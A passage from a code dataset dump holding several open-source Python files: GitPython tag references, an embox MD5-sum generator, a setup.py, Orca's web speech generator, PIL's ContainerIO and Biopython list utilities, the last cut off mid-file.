repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
kenshay/ImageScripter
|
refs/heads/master
|
ProgramData/SystemFiles/Python/Lib/site-packages/git/refs/tag.py
|
4
|
from .reference import Reference
__all__ = ["TagReference", "Tag"]
class TagReference(Reference):
"""Class representing a lightweight tag reference which either points to a commit
,a tag object or any other object. In the latter case additional information,
like the signature or the tag-creator, is available.
This tag object will always point to a commit object, but may carry additional
information in a tag object::
tagref = TagReference.list_items(repo)[0]
print(tagref.commit.message)
if tagref.tag is not None:
print(tagref.tag.message)"""
__slots__ = tuple()
_common_path_default = "refs/tags"
@property
def commit(self):
""":return: Commit object the tag ref points to
:raise ValueError: if the tag points to a tree or blob"""
obj = self.object
while obj.type != 'commit':
if obj.type == "tag":
# it is a tag object which carries the commit as an object - we can point to anything
obj = obj.object
else:
raise ValueError(("Cannot resolve commit as tag %s points to a %s object - " +
"use the `.object` property instead to access it") % (self, obj.type))
return obj
@property
def tag(self):
"""
:return: Tag object this tag ref points to or None in case
we are a light weight tag"""
obj = self.object
if obj.type == "tag":
return obj
return None
# make object read-only
# It should be reasonably hard to adjust an existing tag
object = property(Reference._get_object)
@classmethod
def create(cls, repo, path, ref='HEAD', message=None, force=False, **kwargs):
"""Create a new tag reference.
:param path:
The name of the tag, i.e. 1.0 or releases/1.0.
The prefix refs/tags is implied
:param ref:
A reference to the object you want to tag. It can be a commit, tree or
blob.
:param message:
If not None, the message will be used in your tag object. This will also
create an additional tag object that allows to obtain that information, i.e.::
tagref.tag.message
:param force:
If True, to force creation of a tag even though that tag already exists.
:param kwargs:
Additional keyword arguments to be passed to git-tag
:return: A new TagReference"""
args = (path, ref)
if message:
kwargs['m'] = message
if force:
kwargs['f'] = True
repo.git.tag(*args, **kwargs)
return TagReference(repo, "%s/%s" % (cls._common_path_default, path))
@classmethod
def delete(cls, repo, *tags):
"""Delete the given existing tag or tags"""
repo.git.tag("-d", *tags)
# provide an alias
Tag = TagReference
|
Kakadu/embox
|
refs/heads/clang-compilation
|
mk/gensums.py
|
4
|
#!/usr/bin/env python
import sys
import re
try:
# Python2
import md5
md5factory = md5.new
md5dig = lambda m: [ ord(x) for x in m.digest() ]
except ImportError:
# Python3
import hashlib
md5factory = hashlib.md5
md5dig = lambda m: list(m.digest())
def parse(file, sectname):
vmas = dict()
lens = dict()
target_d = { 'vma' : vmas, 'len' : lens }
for line in file.readlines():
m = re.search(r'([0-9a-f]+)\s[A-Z]\s__module_(.*)_%s_(vma|len)' % (sectname,), line)
if not m:
continue
target = target_d[m.group(3)]
k = m.group(2)
assert not k in target
target[k] = int(m.group(1), 16)
assert len(vmas) == len(lens)
return dict( (k, (vmas[k], lens[k])) for k in vmas )
def main(nmfile, sectname, sectfile, vma_offset):
stat = parse(sys.stdin, sectname)
with open(sectfile, 'rb') as f:
sectdata = f.read()
for mod, (start, dlen) in stat.items():
datastart = start - vma_offset
m = md5factory()
m.update(bytes(sectdata[datastart : datastart + dlen]))
print('const char __module_%s_%s_md5sum[16] = "%s";' %
(mod, sectname, ''.join([ '\\x{0:02x}'.format(x) for x in md5dig(m) ])))
if __name__ == '__main__':
main(sys.stdin, sys.argv[1], sys.argv[2], int(sys.argv[3], 0))
|
theandygross/Figures
|
refs/heads/master
|
setup.py
|
1
|
#!/usr/bin/env python
from setuptools import setup
setup(name='PandasFigureWrappers',
version='0.1',
description='Wrappers for Scipy and R stats using Pandas objects.',
author='Andrew Gross',
author_email='the.andrew.gross@gmail.com',
url='http://andy-gross.flavors.me',
package_dir = {'': 'src'},
packages=['Figures'],
)
|
GNOME/orca
|
refs/heads/master
|
src/orca/scripts/web/speech_generator.py
|
1
|
# Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
# Copyright 2010-2011 Orca Team
# Copyright 2011-2015 Igalia, S.L.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2005-2009 Sun Microsystems Inc." \
"Copyright (c) 2010-2011 Orca Team" \
"Copyright (c) 2011-2015 Igalia, S.L."
__license__ = "LGPL"
import pyatspi
import urllib
from orca import debug
from orca import messages
from orca import object_properties
from orca import orca_state
from orca import settings
from orca import settings_manager
from orca import speech_generator
_settingsManager = settings_manager.getManager()
class SpeechGenerator(speech_generator.SpeechGenerator):
def __init__(self, script):
super().__init__(script)
def _generateOldAncestors(self, obj, **args):
if args.get('index', 0) > 0:
return []
priorObj = args.get('priorObj')
if self._script.utilities.isInlineIframeDescendant(priorObj):
return []
return super()._generateOldAncestors(obj, **args)
def _generateNewAncestors(self, obj, **args):
if args.get('index', 0) > 0 \
and not self._script.utilities.isListDescendant(obj):
return []
if self._script.utilities.isInlineIframeDescendant(obj):
return []
return super()._generateNewAncestors(obj, **args)
def _generateAncestors(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateAncestors(obj, **args)
if self._script.inSayAll() and obj == orca_state.locusOfFocus:
return []
result = []
priorObj = args.get('priorObj')
if priorObj and self._script.utilities.inDocumentContent(priorObj):
priorDoc = self._script.utilities.getDocumentForObject(priorObj)
doc = self._script.utilities.getDocumentForObject(obj)
if priorDoc != doc and not self._script.utilities.getDocumentForObject(doc):
result = [super()._generateName(doc)]
if self._script.utilities.isLink(obj) \
or self._script.utilities.isLandmark(obj) \
or self._script.utilities.isMath(obj) \
or obj.getRole() in [pyatspi.ROLE_TOOL_TIP, pyatspi.ROLE_STATUS_BAR]:
return result
args['stopAtRoles'] = [pyatspi.ROLE_DOCUMENT_FRAME,
pyatspi.ROLE_DOCUMENT_WEB,
pyatspi.ROLE_EMBEDDED,
pyatspi.ROLE_INTERNAL_FRAME,
pyatspi.ROLE_MATH,
pyatspi.ROLE_MENU_BAR]
args['skipRoles'] = [pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_HEADING,
pyatspi.ROLE_LABEL,
pyatspi.ROLE_LINK,
pyatspi.ROLE_LIST_ITEM,
pyatspi.ROLE_TEXT]
args['stopAfterRoles'] = [pyatspi.ROLE_TOOL_BAR]
if self._script.utilities.isEditableDescendantOfComboBox(obj):
args['skipRoles'].append(pyatspi.ROLE_COMBO_BOX)
result.extend(super()._generateAncestors(obj, **args))
return result
def _generateAllTextSelection(self, obj, **args):
if self._script.utilities.isZombie(obj) \
or obj != orca_state.locusOfFocus:
return []
# TODO - JD: These (and the default script's) need to
# call utility methods rather than generate it.
return super()._generateAllTextSelection(obj, **args)
def _generateAnyTextSelection(self, obj, **args):
if self._script.utilities.isZombie(obj) \
or obj != orca_state.locusOfFocus:
return []
# TODO - JD: These (and the default script's) need to
# call utility methods rather than generate it.
return super()._generateAnyTextSelection(obj, **args)
def _generateHasPopup(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return []
result = []
popupType = self._script.utilities.popupType(obj)
if popupType == 'dialog':
result = [messages.HAS_POPUP_DIALOG]
elif popupType == 'grid':
result = [messages.HAS_POPUP_GRID]
elif popupType == 'listbox':
result = [messages.HAS_POPUP_LISTBOX]
elif popupType in ('menu', 'true'):
result = [messages.HAS_POPUP_MENU]
elif popupType == 'tree':
result = [messages.HAS_POPUP_TREE]
if result:
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateClickable(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return []
if not args.get('mode', None):
args['mode'] = self._mode
args['stringType'] = 'clickable'
if self._script.utilities.isClickableElement(obj):
result = [self._script.formatting.getString(**args)]
result.extend(self.voice(speech_generator.SYSTEM))
return result
return []
def _generateDescription(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateDescription(obj, **args)
if self._script.utilities.isZombie(obj):
return []
if self._script.utilities.preferDescriptionOverName(obj):
return []
role = args.get('role', obj.getRole())
if obj != orca_state.locusOfFocus:
if role in [pyatspi.ROLE_ALERT, pyatspi.ROLE_DIALOG]:
return super()._generateDescription(obj, **args)
if not args.get('inMouseReview'):
return []
formatType = args.get('formatType')
if formatType == 'basicWhereAmI' and self._script.utilities.isLiveRegion(obj):
return self._script.liveRegionManager.generateLiveRegionDescription(obj, **args)
if role == pyatspi.ROLE_TEXT and formatType != 'basicWhereAmI':
return []
# TODO - JD: This is private.
if role == pyatspi.ROLE_LINK and self._script._lastCommandWasCaretNav:
return []
return super()._generateDescription(obj, **args)
def _generateHasLongDesc(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return []
if not args.get('mode', None):
args['mode'] = self._mode
args['stringType'] = 'haslongdesc'
if self._script.utilities.hasLongDesc(obj):
result = [self._script.formatting.getString(**args)]
result.extend(self.voice(speech_generator.SYSTEM))
return result
return []
def _generateHasDetails(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateHasDetails(obj, **args)
objs = self._script.utilities.detailsIn(obj)
if not objs:
return []
objString = lambda x: str.strip("%s %s" % (x.name, self.getLocalizedRoleName(x)))
toPresent = ", ".join(set(map(objString, objs)))
args['stringType'] = 'hasdetails'
result = [self._script.formatting.getString(**args) % toPresent]
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateAllDetails(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
objs = self._script.utilities.detailsIn(obj)
if not objs:
container = pyatspi.findAncestor(obj, self._script.utilities.hasDetails)
objs = self._script.utilities.detailsIn(container)
if not objs:
return []
args['stringType'] = 'hasdetails'
result = [self._script.formatting.getString(**args) % ""]
result.extend(self.voice(speech_generator.SYSTEM))
result = []
for o in objs:
result.append(self.getLocalizedRoleName(o))
result.extend(self.voice(speech_generator.SYSTEM))
string = self._script.utilities.expandEOCs(o)
if not string.strip():
continue
result.append(string)
result.extend(self.voice(speech_generator.DEFAULT))
result.extend(self._generatePause(o))
return result
def _generateDetailsFor(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateDetailsFor(obj, **args)
objs = self._script.utilities.detailsFor(obj)
if not objs:
return []
if args.get('leaving'):
return []
lastKey, mods = self._script.utilities.lastKeyAndModifiers()
if (lastKey in ['Down', 'Right'] or self._script.inSayAll()) and args.get('startOffset'):
return []
if lastKey in ['Up', 'Left']:
text = self._script.utilities.queryNonEmptyText(obj)
if text and args.get('endOffset') not in [None, text.characterCount]:
return []
result = []
objArgs = {'stringType': 'detailsfor', 'mode': args.get('mode')}
for o in objs:
string = self._script.utilities.displayedText(o) or self.getLocalizedRoleName(o)
words = string.split()
if len(words) > 5:
words = words[0:5] + ['...']
result.append(self._script.formatting.getString(**objArgs) % " ".join(words))
result.extend(self.voice(speech_generator.SYSTEM))
result.extend(self._generatePause(o, **objArgs))
return result
def _generateLabelOrName(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateLabelOrName(obj, **args)
if self._script.utilities.isTextBlockElement(obj) \
and not self._script.utilities.isLandmark(obj) \
and not self._script.utilities.isDocument(obj) \
and not self._script.utilities.isDPub(obj) \
and not self._script.utilities.isContentSuggestion(obj):
return []
priorObj = args.get("priorObj")
if obj == priorObj:
return []
if priorObj and priorObj in self._script.utilities.labelsForObject(obj):
return []
if self._script.utilities.isContentEditableWithEmbeddedObjects(obj) \
or self._script.utilities.isDocument(obj):
lastKey, mods = self._script.utilities.lastKeyAndModifiers()
if lastKey in ["Home", "End", "Up", "Down", "Left", "Right", "Page_Up", "Page_Down"]:
return []
if priorObj and priorObj.getRole() == pyatspi.ROLE_PAGE_TAB and priorObj.name == obj.name:
return []
if obj.name:
name = obj.name
if not self._script.utilities.hasExplicitName(obj):
name = name.strip()
if self._script.utilities.shouldVerbalizeAllPunctuation(obj):
name = self._script.utilities.verbalizeAllPunctuation(name)
result = [name]
result.extend(self.voice(speech_generator.DEFAULT))
return result
if obj.getRole() == pyatspi.ROLE_CHECK_BOX:
gridCell = pyatspi.findAncestor(obj, self._script.utilities.isGridCell)
if gridCell:
return super()._generateLabelOrName(gridCell, **args)
return super()._generateLabelOrName(obj, **args)
def _generateName(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateName(obj, **args)
if self._script.utilities.isTextBlockElement(obj) \
and not self._script.utilities.isLandmark(obj) \
and not self._script.utilities.isDPub(obj) \
and not args.get('inFlatReview'):
return []
if self._script.utilities.hasVisibleCaption(obj):
return []
if self._script.utilities.isFigure(obj) and args.get('ancestorOf'):
caption = args.get('ancestorOf')
if caption.getRole() != pyatspi.ROLE_CAPTION:
isCaption = lambda x: x and x.getRole() == pyatspi.ROLE_CAPTION
caption = pyatspi.findAncestor(caption, isCaption)
if caption and hash(obj) in self._script.utilities.labelTargets(caption):
return []
role = args.get('role', obj.getRole())
# TODO - JD: Once the formatting strings are vastly cleaned up
# or simply removed, hacks like this won't be needed.
if role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_SPIN_BUTTON]:
return super()._generateName(obj, **args)
if obj.name:
if self._script.utilities.preferDescriptionOverName(obj):
result = [obj.description]
elif self._script.utilities.isLink(obj) \
and not self._script.utilities.hasExplicitName(obj):
return []
else:
name = obj.name
if not self._script.utilities.hasExplicitName(obj):
name = name.strip()
result = [name]
result.extend(self.voice(speech_generator.DEFAULT))
return result
return super()._generateName(obj, **args)
def _generateLabel(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateLabel(obj, **args)
if self._script.utilities.isTextBlockElement(obj):
return []
label, objects = self._script.utilities.inferLabelFor(obj)
if label:
result = [label]
result.extend(self.voice(speech_generator.DEFAULT))
return result
return super()._generateLabel(obj, **args)
def _generateNewNodeLevel(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if self._script.utilities.isTextBlockElement(obj) \
or self._script.utilities.isLink(obj):
return []
return super()._generateNewNodeLevel(obj, **args)
def _generateLeaving(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not args.get('leaving'):
return []
if self._script.utilities.inDocumentContent(obj) \
and not self._script.utilities.inDocumentContent(orca_state.locusOfFocus):
result = ['']
result.extend(self.voice(speech_generator.SYSTEM))
return result
return super()._generateLeaving(obj, **args)
def _generateNewRadioButtonGroup(self, obj, **args):
# TODO - JD: Looking at the default speech generator's method, this
# is all kinds of broken. Until that can be sorted out, try to filter
# out some of the noise....
return []
def _generateNumberOfChildren(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText') \
or _settingsManager.getSetting('speechVerbosityLevel') == settings.VERBOSITY_LEVEL_BRIEF:
return []
# We handle things even for non-document content due to issues in
# other toolkits (e.g. exposing list items to us that are not
# exposed to sighted users)
role = args.get('role', obj.getRole())
if role not in [pyatspi.ROLE_LIST, pyatspi.ROLE_LIST_BOX]:
return super()._generateNumberOfChildren(obj, **args)
setsize = self._script.utilities.getSetSize(obj[0])
if setsize is None:
children = [x for x in obj if x.getRole() == pyatspi.ROLE_LIST_ITEM]
setsize = len(children)
if not setsize:
return []
result = [messages.listItemCount(setsize)]
result.extend(self.voice(speech_generator.SYSTEM))
return result
# TODO - JD: Yet another dumb generator method we should kill.
def _generateTextRole(self, obj, **args):
return self._generateRoleName(obj, **args)
def getLocalizedRoleName(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super().getLocalizedRoleName(obj, **args)
roledescription = self._script.utilities.getRoleDescription(obj)
if roledescription:
return roledescription
return super().getLocalizedRoleName(obj, **args)
def _generateRealActiveDescendantDisplayedText(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateRealActiveDescendantDisplayedText(obj, **args)
return self._generateDisplayedText(obj, **args)
def _generateRoleName(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generateRoleName(obj, **args)
if obj == args.get('priorObj'):
return []
result = []
acss = self.voice(speech_generator.SYSTEM)
roledescription = self._script.utilities.getRoleDescription(obj)
if roledescription:
result = [roledescription]
result.extend(acss)
return result
role = args.get('role', obj.getRole())
enabled, disabled = self._getEnabledAndDisabledContextRoles()
if role in disabled:
return []
force = args.get('force', False)
start = args.get('startOffset')
end = args.get('endOffset')
index = args.get('index', 0)
total = args.get('total', 1)
if not force:
doNotSpeak = [pyatspi.ROLE_FOOTER,
pyatspi.ROLE_FORM,
pyatspi.ROLE_LABEL,
pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_SECTION,
pyatspi.ROLE_REDUNDANT_OBJECT,
pyatspi.ROLE_UNKNOWN]
else:
doNotSpeak = [pyatspi.ROLE_UNKNOWN]
if not force:
doNotSpeak.append(pyatspi.ROLE_TABLE_CELL)
doNotSpeak.append(pyatspi.ROLE_TEXT)
doNotSpeak.append(pyatspi.ROLE_STATIC)
if args.get('string'):
doNotSpeak.append("ROLE_CONTENT_SUGGESTION")
if args.get('formatType', 'unfocused') != 'basicWhereAmI':
doNotSpeak.append(pyatspi.ROLE_LIST_ITEM)
doNotSpeak.append(pyatspi.ROLE_LIST)
if (start or end):
doNotSpeak.append(pyatspi.ROLE_DOCUMENT_FRAME)
doNotSpeak.append(pyatspi.ROLE_DOCUMENT_WEB)
doNotSpeak.append(pyatspi.ROLE_ALERT)
if self._script.utilities.isAnchor(obj):
doNotSpeak.append(obj.getRole())
if total > 1:
doNotSpeak.append(pyatspi.ROLE_ROW_HEADER)
if self._script.utilities.isMenuInCollapsedSelectElement(obj):
doNotSpeak.append(pyatspi.ROLE_MENU)
lastKey, mods = self._script.utilities.lastKeyAndModifiers()
isEditable = obj.getState().contains(pyatspi.STATE_EDITABLE)
if isEditable and not self._script.utilities.isContentEditableWithEmbeddedObjects(obj):
if ((lastKey in ["Down", "Right"] and not mods) or self._script.inSayAll()) and start:
return []
if lastKey in ["Up", "Left"] and not mods:
text = self._script.utilities.queryNonEmptyText(obj)
if text and end not in [None, text.characterCount]:
return []
if role not in doNotSpeak:
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
elif isEditable and self._script.utilities.isDocument(obj):
if obj.parent and not obj.parent.getState().contains(pyatspi.STATE_EDITABLE) \
and lastKey not in ["Home", "End", "Up", "Down", "Left", "Right", "Page_Up", "Page_Down"]:
result.append(object_properties.ROLE_EDITABLE_CONTENT)
result.extend(acss)
elif role == pyatspi.ROLE_HEADING:
if index == total - 1 or not self._script.utilities.isFocusableWithMathChild(obj):
level = self._script.utilities.headingLevel(obj)
if level:
result.append(object_properties.ROLE_HEADING_LEVEL_SPEECH % {
'role': self.getLocalizedRoleName(obj, **args),
'level': level})
result.extend(acss)
else:
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
elif self._script.utilities.isLink(obj):
if obj.parent.getRole() == pyatspi.ROLE_IMAGE:
result.append(messages.IMAGE_MAP_LINK)
result.extend(acss)
else:
if self._script.utilities.hasUselessCanvasDescendant(obj):
result.append(self.getLocalizedRoleName(obj, role=pyatspi.ROLE_IMAGE))
result.extend(acss)
if index == total - 1 or not self._script.utilities.isFocusableWithMathChild(obj):
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
elif role not in doNotSpeak and args.get('priorObj') != obj:
result.append(self.getLocalizedRoleName(obj, **args))
result.extend(acss)
if self._script.utilities.isMath(obj) and not self._script.utilities.isMathTopLevel(obj):
return result
ancestorRoles = [pyatspi.ROLE_HEADING, pyatspi.ROLE_LINK]
speakRoles = lambda x: x and x.getRole() in ancestorRoles
ancestor = pyatspi.findAncestor(obj, speakRoles)
if ancestor and ancestor.getRole() != role and (index == total - 1 or obj.name == ancestor.name):
result.extend(self._generateRoleName(ancestor))
return result
def _generatePageSummary(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return []
onlyIfFound = args.get('formatType') != 'detailedWhereAmI'
string = self._script.utilities.getPageSummary(obj, onlyIfFound)
if not string:
return []
result = [string]
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateSiteDescription(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return []
link_uri = self._script.utilities.uri(obj)
if not link_uri:
return []
link_uri_info = urllib.parse.urlparse(link_uri)
doc_uri = self._script.utilities.documentFrameURI()
if not doc_uri:
return []
result = []
doc_uri_info = urllib.parse.urlparse(doc_uri)
if link_uri_info[1] == doc_uri_info[1]:
if link_uri_info[2] == doc_uri_info[2]:
result.append(messages.LINK_SAME_PAGE)
else:
result.append(messages.LINK_SAME_SITE)
else:
linkdomain = link_uri_info[1].split('.')
docdomain = doc_uri_info[1].split('.')
if len(linkdomain) > 1 and len(docdomain) > 1 \
and linkdomain[-1] == docdomain[-1] \
and linkdomain[-2] == docdomain[-2]:
result.append(messages.LINK_SAME_SITE)
else:
result.append(messages.LINK_DIFFERENT_SITE)
if result:
result.extend(self.voice(speech_generator.HYPERLINK))
return result
def _generateExpandedEOCs(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateExpandedEOCs(obj, **args)
result = []
startOffset = args.get('startOffset', 0)
endOffset = args.get('endOffset', -1)
text = self._script.utilities.expandEOCs(obj, startOffset, endOffset)
if text:
result.append(text)
return result
def _generatePositionInList(self, obj, **args):
if _settingsManager.getSetting('onlySpeakDisplayedText'):
return []
if not args.get('forceList', False) \
and not _settingsManager.getSetting('enablePositionSpeaking'):
return []
if not self._script.utilities.inDocumentContent(obj):
return super()._generatePositionInList(obj, **args)
menuRoles = [pyatspi.ROLE_MENU_ITEM,
pyatspi.ROLE_TEAROFF_MENU_ITEM,
pyatspi.ROLE_CHECK_MENU_ITEM,
pyatspi.ROLE_RADIO_MENU_ITEM,
pyatspi.ROLE_MENU]
if obj.getRole() in menuRoles:
return super()._generatePositionInList(obj, **args)
if self._script.utilities.isEditableComboBox(obj):
return []
if args.get('formatType') not in ['basicWhereAmI', 'detailedWhereAmI']:
if args.get('priorObj') == obj:
return []
position = self._script.utilities.getPositionInSet(obj)
total = self._script.utilities.getSetSize(obj)
if position is None or total is None:
return super()._generatePositionInList(obj, **args)
position = int(position)
total = int(total)
if position < 0 or total < 0:
return []
result = []
result.append(self._script.formatting.getString(
mode='speech',
stringType='groupindex') \
% {"index" : position,
"total" : total})
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateUnselectedCell(self, obj, **args):
if not self._script.inFocusMode():
return []
return super()._generateUnselectedCell(obj, **args)
def _generateRealTableCell(self, obj, **args):
result = super()._generateRealTableCell(obj, **args)
if not self._script.inFocusMode():
return result
if _settingsManager.getSetting('speakCellCoordinates'):
label = self._script.utilities.labelForCellCoordinates(obj)
if label:
result.append(label)
result.extend(self.voice(speech_generator.SYSTEM))
return result
row, col = self._script.utilities.coordinatesForCell(obj)
if self._script.utilities.cellRowChanged(obj):
result.append(messages.TABLE_ROW % (row + 1))
result.extend(self.voice(speech_generator.SYSTEM))
if self._script.utilities.cellColumnChanged(obj):
result.append(messages.TABLE_COLUMN % (col + 1))
result.extend(self.voice(speech_generator.SYSTEM))
return result
def _generateTableCellRow(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
return super()._generateTableCellRow(obj, **args)
if not self._script.utilities.shouldReadFullRow(obj):
return self._generateRealTableCell(obj, **args)
isRow = lambda x: x and x.getRole() == pyatspi.ROLE_TABLE_ROW
row = pyatspi.findAncestor(obj, isRow)
if row and row.name and not self._script.utilities.isLayoutOnly(row):
return self.generate(row)
return super()._generateTableCellRow(obj, **args)
def _generateRowHeader(self, obj, **args):
if self._script.utilities.lastInputEventWasLineNav():
return []
return super()._generateRowHeader(obj)
def generateSpeech(self, obj, **args):
if not self._script.utilities.inDocumentContent(obj):
msg = "WEB: %s is not in document content. Calling default speech generator." % obj
debug.println(debug.LEVEL_INFO, msg, True)
return super().generateSpeech(obj, **args)
msg = "WEB: Generating speech for document object %s" % obj
debug.println(debug.LEVEL_INFO, msg, True)
result = []
if args.get('formatType') == 'detailedWhereAmI':
oldRole = self._overrideRole('default', args)
elif self._script.utilities.isLink(obj):
oldRole = self._overrideRole(pyatspi.ROLE_LINK, args)
elif self._script.utilities.treatAsDiv(obj, offset=args.get('startOffset')):
oldRole = self._overrideRole(pyatspi.ROLE_SECTION, args)
else:
oldRole = self._overrideRole(self._getAlternativeRole(obj, **args), args)
if not 'priorObj' in args:
document = self._script.utilities.getTopLevelDocumentForObject(obj)
args['priorObj'] = self._script.utilities.getPriorContext(document)[0]
if not result:
result = list(filter(lambda x: x, super().generateSpeech(obj, **args)))
self._restoreRole(oldRole, args)
msg = "WEB: Speech generation for document object %s complete." % obj
debug.println(debug.LEVEL_INFO, msg, True)
return result
def generateContents(self, contents, **args):
if not len(contents):
return []
result = []
contents = self._script.utilities.filterContentsForPresentation(contents, True)
msg = "WEB: Generating speech contents (length: %i)" % len(contents)
debug.println(debug.LEVEL_INFO, msg, True)
for i, content in enumerate(contents):
obj, start, end, string = content
msg = "ITEM %i: %s, start: %i, end: %i, string: '%s'" \
% (i, obj, start, end, string)
debug.println(debug.LEVEL_INFO, msg, True)
utterance = self.generateSpeech(
obj, startOffset=start, endOffset=end, string=string,
index=i, total=len(contents), **args)
if isinstance(utterance, list):
isNotEmptyList = lambda x: not (isinstance(x, list) and not x)
utterance = list(filter(isNotEmptyList, utterance))
if utterance and utterance[0]:
result.append(utterance)
args['priorObj'] = obj
if not result:
if self._script.inSayAll(treatInterruptedAsIn=False) \
or not _settingsManager.getSetting('speakBlankLines'):
string = ""
else:
string = messages.BLANK
result = [string, self.voice(speech_generator.DEFAULT)]
return result
|
yasoob/PythonRSSReader
|
refs/heads/master
|
venv/lib/python2.7/dist-packages/PIL/ContainerIO.py
|
18
|
#
# The Python Imaging Library.
# $Id$
#
# a class to read from a container file
#
# History:
# 1995-06-18 fl Created
# 1995-09-07 fl Added readline(), readlines()
#
# Copyright (c) 1997-2001 by Secret Labs AB
# Copyright (c) 1995 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
##
# A file object that provides read access to a part of an existing
# file (for example a TAR file).
class ContainerIO:
##
# Create file object.
#
# @param file Existing file.
# @param offset Start of region, in bytes.
# @param length Size of region, in bytes.
def __init__(self, file, offset, length):
self.fh = file
self.pos = 0
self.offset = offset
self.length = length
self.fh.seek(offset)
##
# Always false.
def isatty(self):
return 0
##
# Move file pointer.
#
# @param offset Offset in bytes.
# @param mode Starting position. Use 0 for beginning of region, 1
# for current offset, and 2 for end of region. You cannot move
# the pointer outside the defined region.
def seek(self, offset, mode = 0):
if mode == 1:
self.pos = self.pos + offset
elif mode == 2:
self.pos = self.length + offset
else:
self.pos = offset
# clamp
self.pos = max(0, min(self.pos, self.length))
self.fh.seek(self.offset + self.pos)
##
# Get current file pointer.
#
# @return Offset from start of region, in bytes.
def tell(self):
return self.pos
##
# Read data.
#
# @def read(bytes=0)
# @param bytes Number of bytes to read. If omitted or zero,
# read until end of region.
# @return An 8-bit string.
def read(self, n = 0):
if n:
n = min(n, self.length - self.pos)
else:
n = self.length - self.pos
if not n: # EOF
return ""
self.pos = self.pos + n
return self.fh.read(n)
##
# Read a line of text.
#
# @return An 8-bit string.
def readline(self):
s = ""
while True:
c = self.read(1)
if not c:
break
s = s + c
if c == "\n":
break
return s
##
# Read multiple lines of text.
#
# @return A list of 8-bit strings.
def readlines(self):
l = []
while True:
s = self.readline()
if not s:
break
l.append(s)
return l
|
ryanraaum/oldowan.mtconvert
|
refs/heads/master
|
oldowan/mtconvert/biopython/listfns.py
|
1
|
# Copyright 2000 by Jeffrey Chang. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""This provides useful general functions for working with lists.
Functions:
asdict Make the list into a dictionary (for fast testing of membership).
items Get one of each item in a list.
count Count the number of times each item appears.
contents Calculate percentage each item appears in a list.
itemindex Make an index of the items in the list.
intersection Get the items in common between 2 lists.
difference Get the items in 1 list, but not the other.
indexesof Get a list of the indexes of some items in a list.
take Take some items from a list.
"""
def asdict(l):
"""asdict(l) -> dictionary
Return a dictionary where the keys are the items in the list, with
arbitrary values. This is useful for quick testing of membership.
"""
return count(l)
def items(l):
"""items(l) -> list of items
Generate a list of one of each item in l. The items are returned
in arbitrary order.
"""
try:
return asdict(l).keys()
except TypeError, x:
if str(x).find("unhashable") == -1:
raise
# asdict failed because l is unhashable. Back up to a naive
# implementation.
l = l[:]
l.sort()
i = 0
while i < len(l)-1:
if l[i] == l[i+1]:
del l[i]
else:
i += 1
return l
def count(items):
"""count(items) -> dict of counts of each item
Count the number of times each item appears in a list of data.
"""
c = {}
for i in items:
c[i] = c.get(i, 0) + 1
return c
def contents(items):
"""contents(items) -> dict of item:percentage
Summarize the contents of the list in terms of the percentages of each
item. For example, if an item appears 3 times in a list with 10 items,
it is in 0.3 of the list.
"""
counts = count(items)
l = float(len(items))
contents = {}
for i, c in counts.items():
contents[i] = c / l
return contents
def intersection(l1, l2):
"""intersection(l1, l2) -> list of common items
